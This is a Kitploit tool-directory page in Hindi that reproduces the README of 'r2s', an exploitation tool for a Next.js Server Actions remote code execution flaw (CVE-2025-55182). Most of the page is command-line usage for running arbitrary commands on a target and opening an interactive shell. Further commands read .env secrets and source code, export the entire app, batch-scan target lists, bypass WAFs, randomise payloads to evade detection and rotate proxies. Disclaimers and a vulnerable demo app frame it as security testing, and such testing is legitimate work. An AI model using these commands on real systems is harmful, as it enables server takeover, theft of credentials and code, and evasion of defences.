Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
r2s — Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता मूल्यांकन के लिए उन्नत सुरक्षा परीक्षण उपकरण। इसमें इंटरैक्टिव शेल, बैच स्कैनिंग, WAF बायपास और व्यापक रिपोर्टिंग सुविधाएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/zamdevio/r2s
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाWAF बाईपासपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubzamdevio/r2s

r2s

Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता मूल्यांकन के लिए उन्नत सुरक्षा परीक्षण उपकरण। इसमें इंटरैक्टिव शेल, बैच स्कैनिंग, WAF बायपास और व्यापक रिपोर्टिंग सुविधाएँ शामिल हैं।

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

React2Shell (R2S) - CVE-2025-55182 परीक्षण उपकरण

R2S Banner Python License

CVE-2025-55182 भेद्यता आकलन के लिए उन्नत शोषण परीक्षण उपकरण

विशेषताएँ • स्थापना • उपयोग • परीक्षण वातावरण • कानूनी अस्वीकरण


📖 R2S क्या है?

R2S (React2Shell) एक सुरक्षा परीक्षण उपकरण है जिसे सुरक्षा शोधकर्ताओं, डेवलपर्स और पैठ परीक्षकों की यह आकलन करने में सहायता करने के लिए डिज़ाइन किया गया है कि उनके Next.js अनुप्रयोग CVE-2025-55182 के प्रति भेद्य हैं या नहीं।

CVE-2025-55182 को समझना

CVE-2025-55182 एक गंभीर भेद्यता है जो कुछ संस्करणों (जैसे, 16.0.5) में Next.js Server Actions को प्रभावित करती है। यह भेद्यता हमलावरों को अनुचित रूप से सुरक्षित Server Actions के माध्यम से सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे Remote Code Execution (RCE) होता है।

R2S आपको यह जाँचने में मदद करता है कि आपके एप्लिकेशन में यह समस्या है या नहीं, ताकि आप इसे हमलावरों के पता लगाने से पहले ठीक कर सकें।


⚠️ महत्वपूर्ण नोट्स

Windows कमांड फ़्लैग (--windows)

⚠️ गंभीर चेतावनी: --windows फ़्लैग का उपयोग गलत तरीके से करने पर उपकरण भेद्यता का निर्धारण करने में विफल हो सकता है।

  • डिफ़ॉल्ट व्यवहार: उपकरण Unix/Linux कमांड का उपयोग करता है (अधिकांश Next.js सर्वर Linux पर चलते हैं)
  • --windows का उपयोग कब करें: केवल तभी जब आप 100% आश्वस्त हों कि लक्ष्य सर्वर Windows है
  • गलत होने पर क्या होता है: यदि आप Linux सर्वर पर --windows का उपयोग करते हैं, तो कमांड विफल हो जाएंगे और उपकरण "भेद्य नहीं" रिपोर्ट कर सकता है, भले ही सर्वर भेद्य हो
  • सर्वोत्तम अभ्यास: उपकरण को प्लेटफ़ॉर्म स्वतः पहचानने दें, या जब तक आप नहीं जानते कि लक्ष्य Windows है, तब तक --windows का उपयोग न करें

उदाहरण:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---

## ⚠️ कानूनी अस्वीकरण

**महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे पढ़ें**

1. **यह टूल केवल वैध सुरक्षा परीक्षण के लिए है**
   - ✅ अपने स्वयं के अनुप्रयोगों का परीक्षण करें
   - ✅ उन अनुप्रयोगों का परीक्षण करें जिनके परीक्षण के लिए आपके पास लिखित अनुमति है
   - ✅ शैक्षिक उद्देश्य और सुरक्षा अनुसंधान
   - ❌ **ऐसे सिस्टम पर कभी उपयोग न करें जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है**
   - ❌ **दुर्भावनापूर्ण उद्देश्यों के लिए कभी उपयोग न करें**

2. **इस टूल का उपयोग करके, आप सहमत हैं कि:**
   - आप इसका उपयोग केवल उन सिस्टम पर करेंगे जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
   - आप समझते हैं कि कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
   - आप अपने कार्यों की पूर्ण जिम्मेदारी स्वीकार करते हैं
   - लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं

3. **कानूनी परिणाम:**
   - अधिकांश देशों में कंप्यूटर सिस्टम तक अनधिकृत पहुंच एक अपराध है
   - आप पर आपराधिक आरोप, जुर्माना और कारावास हो सकता है
   - परीक्षण से पहले हमेशा लिखित अनुमति लें

4. **यह टूल बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान किया गया है**

**यदि आप 18 वर्ष से कम हैं, तो इस टूल का उपयोग करने से पहले सुनिश्चित करें कि आपके पास वयस्क पर्यवेक्षण और अनुमति है।**

---

## ✨ विशेषताएँ

### मुख्य क्षमताएँ
- 🔍 **भेद्यता का पता लगाना** - जाँचें कि सर्वर CVE-2025-55182 के लिए संवेदनशील है या नहीं
- 💻 **इंटरैक्टिव शेल** - कमांड इतिहास के साथ HTTPS पर पूर्ण इंटरैक्टिव शेल सत्र
- 📁 **फ़ाइल संचालन** - निर्देशिकाएँ सूचीबद्ध करें, फ़ाइलें पढ़ें, और फ़ाइलें/संग्रह निर्यात करें
- 🔐 **गोपनीय जानकारी निकालना** - एप्लिकेशन गोपनीय जानकारी (.env फ़ाइलें, कॉन्फ़िग फ़ाइलें) पढ़ने का प्रयास करता है
- 📄 **कोड निकालना** - एप्लिकेशन स्रोत कोड पढ़ने का प्रयास करता है
- 🖥️ **सिस्टम जानकारी** - OS जानकारी, होस्टनाम, उपयोगकर्ता और पर्यावरण चर एकत्र करें

### उन्नत विशेषताएँ
- 🚀 **ऑटो-वार्मिंग पेलोड** - सर्वोत्तम परिणामों के लिए पेलोड को स्वचालित रूप से अनुकूलित करता है
- ⚡ **समानांतर निष्पादन** - एक साथ कई कमांड चलाएँ
- 🎲 **पेलोड रैंडमाइज़ेशन** - गतिशील पेलोड के साथ पहचान से बचें
- 🛠️ **एक्सप्लॉइट मॉड्यूल** - Metasploit-शैली मॉड्यूल प्रणाली (env_dump, file_search, network_scan, process_list)
- 🔄 **रीडायरेक्ट हैंडलिंग** - HTTP रीडायरेक्ट (301, 302, 303, 307, 308) को स्वचालित रूप से फ़ॉलो करता है
- 🎨 **सुंदर UI** - आसान पढ़ने के लिए रंग-कोडित आउटपुट
- 📊 **व्यापक रिपोर्टिंग** - ऑपरेशन-विशिष्ट फ़ॉर्मेटर्स के साथ JSON, HTML, TXT प्रारूपों में रिपोर्ट स्वतः सहेजें
- ⚙️ **कॉन्फ़िगरेशन प्रणाली** - इंटरैक्टिव सेटिंग्स पैनल के साथ JSON-आधारित कॉन्फ़िग
- 📦 **निर्यात कार्यक्षमता** - एकल फ़ाइलें या संपूर्ण ऐप निर्देशिकाओं को zip संग्रह के रूप में निर्यात करें
- 🔒 **WAF बायपास** - कई बायपास तकनीकें (⚠️ गारंटी नहीं - नीचे सीमाएँ देखें)

### रिपोर्टिंग और लॉगिंग
- 📝 **ऑटो-सेव रिपोर्ट** - मानव-पठनीय टाइमस्टैम्प के साथ रिपोर्ट को `~/.r2s/reports/` में स्वचालित रूप से सहेजें
- 📋 **ऑपरेशन-विशिष्ट प्रारूप** - विभिन्न ऑपरेशनों के लिए अलग-अलग रिपोर्ट प्रारूप (शेल, परीक्षण, गोपनीय जानकारी, आदि)
- 📜 **कमांड इतिहास** - `~/.r2s/history` में सहेजा गया स्थायी कमांड इतिहास
- 🔍 **ऑडिट ट्रेल** - `~/.r2s/logs/audit.log` में सभी ऑपरेशनों की विस्तृत लॉगिंग
- 🎨 **HTML रिपोर्ट** - डार्क/लाइट मोड, कॉपी बटन और कोड ब्लॉक के साथ सुंदर HTML रिपोर्ट

---

## 📦 इंस्टॉलेशन

### विकल्प 1: स्रोत से बिल्ड करें (अनुशंसित)

1. **रिपॉजिटरी क्लोन करें:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. निर्भरताएँ स्थापित करें: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. स्टैंडअलोन बाइनरी बनाएँ: ```bash ./build.sh
    root@kitploit:~
  3. सिस्टम में इंस्टॉल करें (वैकल्पिक): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. बिल्ड आर्टिफैक्ट्स साफ़ करें (वैकल्पिक): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

विकल्प 2: Python स्क्रिप्ट सीधे उपयोग करें```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---

## 🚀 त्वरित आरंभ

### बुनियादी भेद्यता परीक्षण```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ महत्वपूर्ण: जब तक आपको यकीन न हो कि लक्ष्य Windows है, --windows का उपयोग न करें। Linux सर्वर पर --windows का उपयोग करने से गलत नकारात्मक परिणाम आ सकते हैं (टूल "असुरक्षित नहीं" रिपोर्ट कर सकता है, भले ही सर्वर असुरक्षित हो)।

ऑनलाइन डेमो के साथ परीक्षण करें

We provide a safe testing environment at **https://r2s-arena.fly.dev**:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### स्थानीय रूप से परीक्षण करें

स्थानीय रूप से भेद्य ऐप चलाने के निर्देशों के लिए [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) देखें।

---

## 📚 उपयोग उदाहरण

### त्वरित कमांड संदर्भ

**सबसे सामान्य कमांड:**
- `r2s -u URL -t` - भेद्यता के लिए परीक्षण करें (सबसे सामान्य)
- `r2s -u URL --shell` - इंटरैक्टिव शेल शुरू करें
- `r2s --targets FILE -t` - कई लक्ष्यों का बैच स्कैन करें
- `r2s -u URL --system-info` - सिस्टम जानकारी प्राप्त करें
- `r2s -u URL --secrets` - सीक्रेट पढ़ने का प्रयास करें
- `r2s -u URL --export-archive` - संपूर्ण ऐप को zip के रूप में निर्यात करें

**⚠️ याद रखें**: जब तक लक्ष्य Windows न हो, `--windows` का उपयोग न करें!

---

### मूल संचालन```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

इंटरैक्टिव शेल```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### एक्सप्लॉइट मॉड्यूल```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

निर्यात कार्यक्षमता```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### गोपनीय जानकारी और कोड निष्कर्षण```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

बैच स्कैनिंग (एकाधिक लक्ष्य)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### उन्नत विकल्प```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

प्रॉक्सी और नेटवर्क विकल्प```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### लॉगिंग और ऑडिट```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

सेटिंग्स और कॉन्फ़िगरेशन```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### रिपोर्टिंग```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 सामान्य उपयोग के मामले

1. अपने स्वयं के एप्लिकेशन का परीक्षण करना```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. सुरक्षा ऑडिट```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. शैक्षिक परीक्षण

प्रदान किए गए nextjs एप्लिकेशन का उपयोग सुरक्षित, स्थानीय परीक्षण के लिए करें:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
विस्तृत निर्देशों के लिए [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) देखें।

---

## 🏗️ आर्किटेक्चर

R2S अनुरक्षणीयता और विस्तारशीलता के लिए एक मॉड्यूलर आर्किटेक्चर का उपयोग करता है:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

विस्तृत आर्किटेक्चर दस्तावेज़ीकरण के लिए react2shell/README.md देखें।


🧪 परीक्षण वातावरण

हम एक सुरक्षित परीक्षण वातावरण प्रदान करते हैं जिसे nextjs कहा जाता है, जिसका उपयोग आप वास्तविक सिस्टम को जोखिम में डाले बिना टूल का परीक्षण करने के लिए कर सकते हैं।

ऑनलाइन डेमो

विज़िट करें: https://r2s-arena.fly.dev

यह एक सार्वजनिक रूप से उपलब्ध, जानबूझकर असुरक्षित एप्लिकेशन है जो केवल परीक्षण उद्देश्यों के लिए है।

स्थानीय परीक्षण

इसे स्थानीय रूप से चलाने के निर्देशों के लिए nextjs/README.md देखें।

⚠️ महत्वपूर्ण: nextjs एप्लिकेशन जानबूझकर असुरक्षित है और इसे कभी भी प्रोडक्शन या वास्तविक डेटा के साथ उपयोग नहीं किया जाना चाहिए।


📖 कमांड संदर्भ

बुनियादी कमांड

एक्सपोर्ट कमांड

कमांडविवरण
--export FILE, --ex FILEलक्ष्य से एक फ़ाइल एक्सपोर्ट करें (~/.r2s/exports/{domain}/ में सहेजी जाती है)
--export-archiveपूरी ऐप निर्देशिका को ज़िप आर्काइव के रूप में एक्सपोर्ट करें। सर्वर पर ज़िप बनाता है, उसे डाउनलोड करता है, फिर सर्वर से हटा देता है। .gitignore पैटर्न को बाहर रखता है। ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip में सहेजा जाता है।

मॉड्यूल कमांड

कमांडविवरण
--module NAMEएक्सप्लॉइट मॉड्यूल निष्पादित करें
--module-list, --list-modulesउपलब्ध मॉड्यूल सूचीबद्ध करें

उन्नत विकल्प

रिपोर्टिंग विकल्प

विकल्पविवरण
--output FILE, -o FILEपरिणामों को विशिष्ट फ़ाइल में सहेजें (ऑटो-सेव अक्षम करता है)

नेटवर्क और प्रॉक्सी विकल्प

बैच और ऑटोमेशन विकल्प

विकल्पविवरण
--targets FILEफ़ाइल से कई लक्ष्यों को स्कैन करें (प्रति पंक्ति एक URL, # के साथ टिप्पणियाँ समर्थित)
--batchबैच मोड: सभी इंटरैक्टिव प्रॉम्प्ट छोड़ें, स्वतः जारी रखें (ऑटोमेशन/स्क्रिप्ट के लिए उपयोगी)

विशेष कमांड

कमांडविवरण
r2s settingsइंटरैक्टिव सेटिंग्स पैनल खोलें
r2s cleanupसभी R2S डेटा हटाएँ (कॉन्फ़िग, इतिहास, लॉग, रिपोर्ट, एक्सपोर्ट)

🔧 समस्या निवारण

"SSL त्रुटि"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "कनेक्शन त्रुटि"
- जाँचें कि सर्वर चल रहा है या नहीं
- सत्यापित करें कि URL सही है
- फ़ायरवॉल सेटिंग्स जाँचें
- टाइमआउट बढ़ाने का प्रयास करें: `--timeout 30`

### "अनुरोध अवरुद्ध"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"भेद्यता निर्धारित नहीं की जा सकी" या गलत नकारात्मक (False Negatives)

⚠️ महत्वपूर्ण: विंडोज़ कमांड फ़्लैग

यदि आपको गलत नकारात्मक परिणाम मिल रहे हैं (टूल कहता है "भेद्य नहीं" लेकिन लक्ष्य वास्तव में भेद्य है), तो जाँचें:

  1. क्या आपने --windows फ़्लैग का उपयोग किया है?

    • --windows फ़्लैग टूल को विंडोज़ कमांड (PowerShell, dir, आदि) उपयोग करने के लिए बनाता है
    • यदि आपका लक्ष्य Unix/Linux है (अधिकांश Next.js सर्वर ऐसे हैं), तो --windows का उपयोग करने से टूल विफल हो जाएगा
    • टूल Linux सर्वर पर विंडोज़ कमांड निष्पादित करने का प्रयास करेगा, जो विफल हो जाएगा
    • समाधान: --windows फ़्लैग हटाएँ (Unix/Linux डिफ़ॉल्ट है)
  2. प्लेटफ़ॉर्म पहचान

    • टूल प्लेटफ़ॉर्म स्वतः पहचानता है, लेकिन आप इसे ओवरराइड कर सकते हैं
    • केवल --windows का उपयोग करें यदि आप 100% आश्वस्त हैं कि लक्ष्य विंडोज़ है
    • अधिकांश Next.js डिप्लॉयमेंट Linux/Unix सिस्टम पर होते हैं
  3. परीक्षण कमांड

    • डिफ़ॉल्ट परीक्षण Unix कमांड का उपयोग करता है: echo $((41*271))
    • --windows के साथ, यह उपयोग करता है: powershell -c "41*271"
    • यदि सर्वर Linux है लेकिन आप विंडोज़ कमांड का उपयोग करते हैं, तो परीक्षण विफल हो जाएगा

समस्या का उदाहरण:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### WAF बाईपास सीमाएँ

**⚠️ महत्वपूर्ण:** इस टूल में WAF बाईपास तकनीकों के काम करने की **गारंटी नहीं है** और उनकी कई सीमाएँ हैं:

- **सार्वभौमिक नहीं**: अलग-अलग WAF अलग-अलग पहचान विधियों का उपयोग करते हैं। जो एक के लिए काम करता है, वह दूसरे के लिए काम नहीं कर सकता।
- **स्थैतिक पहचान**: कुछ WAF स्थैतिक पैटर्न मिलान का उपयोग करते हैं जिसे बाईपास किया जा सकता है, लेकिन आधुनिक WAF व्यवहारिक विश्लेषण का उपयोग करते हैं।
- **दर सीमा**: कई WAF दर सीमा लागू करते हैं जो बार-बार के प्रयासों को रोक सकती है।
- **मशीन लर्निंग**: उन्नत WAF मशीन लर्निंग मॉडल का उपयोग करते हैं जो हमले के पैटर्न से अनुकूलन और सीखते हैं।
- **Cloudflare/AWS WAF**: एंटरप्राइज़-ग्रेड WAF (Cloudflare, AWS WAF, आदि) को बाईपास करना अत्यंत कठिन है।
- **कोई गारंटी नहीं**: बाईपास तकनीकें प्रयोगात्मक हैं और अच्छी तरह से कॉन्फ़िगर किए गए WAF के सामने विफल हो सकती हैं।

**सर्वोत्तम अभ्यास:**
- WAF बाईपास का उपयोग अंतिम विकल्प के रूप में करें
- अलग-अलग हेडर रणनीतियाँ आज़माएँ (`--header-strategy`)
- बेहतर परिणामों के लिए `--randomize` के साथ संयोजन करें
- समझें कि कुछ लक्ष्यों को बाईपास करना असंभव हो सकता है
- हमेशा उन सिस्टमों पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति आपके पास है

### बिल्ड समस्याएँ```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

बिल्ड आर्टिफैक्ट्स की सफाई

सभी बिल्ड आर्टिफैक्ट्स (बिल्ड डायरेक्टरी, कैश फ़ाइलें, आदि) को सुरक्षित रूप से हटाने के लिए:```bash ./build.sh cleanup

root@kitploit:~
यह निम्नलिखित हटाएगा:
- `build/` डायरेक्टरी (PyInstaller बिल्ड फ़ाइलें)
- `dist/` डायरेक्टरी (संकलित बाइनरी)
- `__pycache__/` डायरेक्टरीज़ (Python कैश, पुनरावर्ती रूप से)
- `*.pyc` फ़ाइलें (संकलित Python बाइटकोड)
- `*.pyo` फ़ाइलें (अनुकूलित Python बाइटकोड)
- `*.spec` फ़ाइलें (PyInstaller spec फ़ाइलें)

**नोट:** यह केवल बिल्ड आर्टिफैक्ट्स हटाता है, आपका सोर्स कोड नहीं। सफाई सुरक्षित है और आगे बढ़ने से पहले पुष्टि मांगेगी।

---

## 📁 फ़ाइल संरचना```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने बदलाव करें
  4. पुल रिक्वेस्ट सबमिट करें

याद रखें: केवल वही कोड योगदान करें जो वैध सुरक्षा परीक्षण में सहायक हो।


📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

हालांकि, इस टूल का उपयोग उपरोक्त कानूनी अस्वीकरण के अधीन है। अनधिकृत पहुंच के लिए इस टूल का उपयोग अवैध है और यह इस लाइसेंस के अंतर्गत कवर नहीं है।


👨‍💻 डेवलपर

zamdevio

  • GitHub: https://github.com/zamdevio
  • प्रोजेक्ट रिपॉजिटरी: https://github.com/zamdevio/r2s

🙏 आभार

  • सुरक्षा शोधकर्ता जिन्होंने CVE-2025-55182 की खोज की
  • ओपन-सोर्स सुरक्षा समुदाय
  • इस प्रोजेक्ट के सभी योगदानकर्ता

📞 सहायता

  • समस्याएं: GitHub Issues
  • सुरक्षा: सुरक्षा समस्याओं की जिम्मेदारी से रिपोर्ट करें

⚠️ अंतिम अनुस्मारक

यह टूल केवल सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

  • ✅ परीक्षण से पहले हमेशा अनुमति लें
  • ✅ केवल उन्हीं सिस्टम का परीक्षण करें जिनके मालिक हैं या जिनके परीक्षण की अनुमति है
  • ✅ जिम्मेदारी और नैतिकता से उपयोग करें
  • ❌ कभी भी दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
  • ❌ बिना अनुमति के कभी भी सिस्टम का परीक्षण न करें

कानूनी रहें, नैतिक रहें, सुरक्षित रहें! 🛡️


सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

⬆ वापस शीर्ष पर

टूल डाउनलोड करें
कमांडविवरण
-u, --url URLलक्ष्य URL (अधिकांश कार्यों के लिए आवश्यक)
-t, --testजाँचें कि सर्वर असुरक्षित है या नहीं
-ld, --list-dir PATHनिर्देशिका सामग्री सूचीबद्ध करें
-rf, --read-file FILEफ़ाइल सामग्री पढ़ें
-si, --system-infoसिस्टम जानकारी प्राप्त करें
-sr, --secretsगोपनीय जानकारी (secrets) पढ़ने का प्रयास करें
-c, --codeस्रोत कोड पढ़ने का प्रयास करें
-cmd, --command CMDकस्टम कमांड निष्पादित करें
--shellइंटरैक्टिव शेल प्रारंभ करें
--module-info NAMEमॉड्यूल जानकारी दिखाएँ
--set KEY=VALUEमॉड्यूल विकल्प सेट करें
विकल्पविवरण
--waf-bypassWAF बायपास तकनीकों का प्रयास करें (⚠️ गारंटी नहीं - नीचे सीमाएँ देखें)
--waf-bypass-size KBKB में WAF बायपास जंक डेटा आकार (डिफ़ॉल्ट: 128)
--vercel-waf-bypassVercel-विशिष्ट WAF बायपास तकनीकें सक्षम करें
--header-strategy STRATEGYHTTP हेडर रणनीति: default, chrome_latest, firefox, minimal, assetnote
--parallel NN कमांड समानांतर में निष्पादित करें (कई कमांड के लिए उपयोगी)
--auto-warmनिष्पादन से पहले पेलोड को स्वचालित रूप से वार्म और अनुकूलित करें
--randomizeस्टैटिक डिटेक्शन से बचने के लिए पेलोड को रैंडमाइज़ करें
--no-follow-redirectsHTTP रीडायरेक्ट (301, 302, आदि) का स्वचालित रूप से अनुसरण न करें
-k, --insecureSSL प्रमाणपत्र सत्यापन अक्षम करें (सावधानी से उपयोग करें)
--timeout SECONDSसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10, कोई टाइमआउट नहीं के लिए 0 उपयोग करें)
--windows⚠️ चेतावनी: Unix/Linux के बजाय Windows कमांड का उपयोग करें। यदि लक्ष्य वास्तव में Unix/Linux है, तो यह टूल को भेद्यता निर्धारित करने में विफल कर सकता है। केवल तभी उपयोग करें जब आपको निश्चित है कि लक्ष्य Windows है।
--rate RATEअनुरोधों को प्रति सेकंड RATE अनुरोधों तक सीमित करें (बैच स्कैनिंग के लिए उपयोगी)
--delay SECONDSअनुरोधों के बीच सेकंड में देरी जोड़ें (रेट लिमिटिंग से बचने में मदद करता है)
